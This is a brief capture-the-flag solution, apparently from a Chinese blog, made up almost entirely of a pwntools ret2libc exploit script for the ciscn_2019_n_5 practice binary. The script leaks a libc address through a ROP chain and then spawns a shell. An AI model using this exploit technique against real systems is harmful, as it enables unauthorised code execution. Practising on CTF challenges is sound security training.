非常normal的ret2libc
点击查看代码
from pwn import *
from LibcSearcher import *
io = remote('node5.buuoj.cn',27414)
#io = process('./ciscn_2019_n_5')
elf = ELF('./ciscn_2019_n_5')
main = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_addr=0x0400713
payload1 = cyclic(0x28) + p64(pop_rdi_addr) + p64(puts_got) + p64(puts_plt)+p64(main)
io.sendline(b'aa')
#io.sendline(payload1)
io.sendlineafter('me?',payload1)
#puts = u64(io.recvuntil(b'\xf7')[-8:])
#puts = u64((io.recvline().split(b'\x0a')[0]).ljust(8,b'\x00'))
puts = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\0'))
print(hex(puts))
libc = LibcSearcher('puts',puts)
libc_base = puts - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
pop_ret_addr=0x04004c9
payload2 = cyclic(0x28) + p64(pop_ret_addr) +p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
io.sendline(b'aa')
#io.sendline(payload2)
io.sendlineafter('me?',payload2)
io.interactive()